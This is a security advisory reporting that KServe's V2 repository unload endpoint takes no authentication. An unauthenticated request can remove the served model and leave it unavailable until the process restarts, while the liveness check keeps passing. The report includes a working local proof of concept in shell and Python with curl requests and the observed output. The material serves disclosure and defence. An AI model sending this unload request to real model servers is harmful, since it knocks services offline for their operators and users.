Unauthenticated V2 repository unload endpoint disables the served model until process restart
Affected repository: kserve/kserve
Observed HEAD: 117261274eb0f7cd76e25b05928cc9b8553a531d
Sink: python/kserve/kserve/protocol/rest/v2_endpoints.py:217 in V2Endpoints.unload
Observed verdict: reproduced dynamically against the latest default branch
Summary
An unauthenticated inference client can send POST /v2/repository/models/{name}/unload to the model server's ordinary HTTP port. KServe passes the path-controlled model name to ModelRepository.unload, stops the model and removes it from the in-process registry. Subsequent predictions fail while the liveness endpoint stays healthy, so the model remains unavailable until the serving process is restarted or otherwise replaced.
Detail
register_v2_repository_endpoints registers both repository-management routes unconditionally in python/kserve/kserve/protocol/rest/v2_endpoints.py:296-304. They share the FastAPI application and listener used for health and inference requests and have no authentication dependency. V2Endpoints.unload takes model_name directly from the URL and calls ModelRepositoryExtension.unload, which reaches ModelRepository.unload, invokes the model's stop() or stop_engine(), and deletes it from the registry.
The paired load route does not restore the removed model: ModelRepository.load() is a no-op stub, and the observed request returns that the model is not ready. At the same time, GET /v2/health/live continues returning HTTP 200, so the normal liveness signal does not cause Kubernetes to restart the process. This converts access to the inference data plane into an unauthenticated model-lifecycle operation and creates sustained denial of service without crashing the pod.
The attacker only needs network access to the model server port. KServe's generated routing sends predictor paths to that port, and the base configuration does not place a route-specific authorization check in front of the repository endpoint. An operator-supplied gateway policy can reduce reachability, but it is not an application-layer control on this route.
Reproduce
This starts KServe's real sklearnserver with a real fitted model, then uses
ordinary HTTP requests from outside the server process. No route, repository,
model, or HTTP client is replaced:
git clone --depth 1 https://github.com/kserve/kserve.git kserve-repro
cd kserve-repro/python/sklearnserver
git rev-parse HEAD
uv sync --python 3.13
model_dir=$(mktemp -d)
uv run python - "$model_dir" <<'PY'
import sys
from joblib import dump
from sklearn.datasets import load_iris
from sklearn.svm import SVC
features, labels = load_iris(return_X_y=True)
dump(SVC().fit(features, labels), f"{sys.argv[1]}/model.joblib")
PY
uv run python -m sklearnserver \
--model_name victim \
--model_dir "$model_dir" \
--http_port 18080 \
--enable_grpc false \
--configure_logging false >/tmp/kserve-server.log 2>&1 &
server_pid=$!
trap 'kill "$server_pid" 2>/dev/null || true' EXIT
until curl -fsS http://127.0.0.1:18080/v2/health/live >/dev/null; do sleep 1; done
printf 'before='; curl -sS http://127.0.0.1:18080/v2/models
printf '\npredict_before='; curl -sS -w ' status=%{http_code}' \
-X POST http://127.0.0.1:18080/v1/models/victim:predict \
-H 'content-type: application/json' --data '{"instances":[[5.1,3.5,1.4,0.2]]}'
printf '\nunload='; curl -sS -X POST \
http://127.0.0.1:18080/v2/repository/models/victim/unload
printf '\nafter='; curl -sS http://127.0.0.1:18080/v2/models
printf '\npredict_after='; curl -sS -w ' status=%{http_code}' \
-X POST http://127.0.0.1:18080/v1/models/victim:predict \
-H 'content-type: application/json' --data '{"instances":[[5.1,3.5,1.4,0.2]]}'
printf '\nlive_after='; curl -sS -w ' status=%{http_code}' \
http://127.0.0.1:18080/v2/health/live
printf '\nload='; curl -sS -X POST \
http://127.0.0.1:18080/v2/repository/models/victim/load
printf '\nafter_load='; curl -sS http://127.0.0.1:18080/v2/models
printf '\n'
Observed at 117261274eb0f7cd76e25b05928cc9b8553a531d:
before={"models":["victim"]}
predict_before={"predictions":[0]} status=200
unload={"name":"victim","unload":true}
after={"models":[]}
predict_after={"error":"Model with name victim does not exist."} status=404
live_after={"live":true} status=200
load={"error":"Model with name victim is not ready."}
after_load={"models":[]}
Credit
Zheng Yu @ Depthfirst